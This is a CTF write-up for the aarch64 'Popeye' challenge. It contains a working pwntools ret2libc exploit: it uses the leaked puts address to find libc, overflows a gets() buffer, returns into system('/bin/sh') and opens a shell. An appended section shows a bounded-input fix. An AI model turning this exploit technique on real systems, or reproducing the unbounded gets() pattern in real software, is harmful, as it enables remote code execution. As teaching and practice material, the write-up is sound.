AOFCTF '24 - Pwn - Popeye

Challenge Description

[image: challenge description]

Solution

Popeye was probably the easiest challenge in AOFCTF: we were already given a libc leak, so there wasn't much left to do, and it had a straightforward buffer overflow. But since it was on ARM (aarch64), most people didn't even try it :((( :welp:

I don't think I even need to explain this chall, so I'll just paste the solve script. First, the decompiled code:

void vuln(void)
{
  char acStack_20 [32];   // 32-byte stack buffer

  printf("[To make it easier: %p]\n",puts);   // leaks the address of puts -> libc base
  gets(acStack_20);                            // unbounded read: stack buffer overflow
  return;
}

The solve script is:

exploit.py
#!/usr/bin/env python3

import sys
from pwn import *
context.terminal = ["tmux", "splitw", "-h"]

# context.binary sets arch/bits (aarch64, 64-bit), so flat() packs 8-byte words
elf = context.binary = ELF("./popeye")
io = remote(sys.argv[1], int(sys.argv[2])) if args.REMOTE else process()
libc = ELF("./libc.so.6")

# Parse the leaked puts address and derive the libc base from it
io.recvuntil(b": ")
libc.address = int(io.recvuntil(b"]")[:-1], 16) - libc.sym.puts
info("libc @ %#x" % libc.address)

payload = flat(
    cyclic(40, n=8),                    # fill the 32-byte buffer plus the saved frame pointer
    0x0000000000400944,                 # gadget address taken from the binary
    next(libc.search(b"/bin/sh\x00")),  # pointer to "/bin/sh" inside libc
    libc.sym.system                     # system() in libc
)

io.sendline(payload)
io.interactive()

You just had to extract the libc from the provided Dockerfile (you could get the aarch64 libc using my script ;))
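For completeness, here is what a fix for vuln() looks like: an added example, not the challenge's or the author's code. The root cause is the gets() call, so the bounded reader below reads at most 31 bytes into the same 32-byte buffer, strips the newline and drains the rest of an over-long line instead of letting it run past the buffer. The read_from_string helper (assumed, for the check only) feeds a constructed line through a memory stream.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Bounded replacement for gets(): stores at most cap-1 bytes in dst.
 * Returns the number of bytes stored, -1 on EOF before any input,
 * or -2 if the line was longer than cap-1 bytes (extra bytes are
 * discarded so the next read starts on a fresh line). */
int read_line_bounded(char *dst, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[--n] = '\0';
        return (int)n;
    }
    /* No newline: either EOF ended the line or it did not fit. */
    int c, truncated = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        truncated = 1;
    return truncated ? -2 : (int)n;
}

/* Hardened vuln(): same 32-byte buffer, but input can no longer overflow it.
 * The deliberate puts leak is dropped as well. */
void vuln_fixed(void)
{
    char buf[32];
    if (read_line_bounded(buf, sizeof buf, stdin) < 0)
        return;
    puts(buf);
}

/* Helper (assumed, not from the challenge): run the reader over a constructed string. */
int read_from_string(const char *src, char *dst, size_t cap)
{
    FILE *f = fmemopen((void *)src, strlen(src), "r");
    if (f == NULL)
        return -1;
    int r = read_line_bounded(dst, cap, f);
    fclose(f);
    return r;
}
```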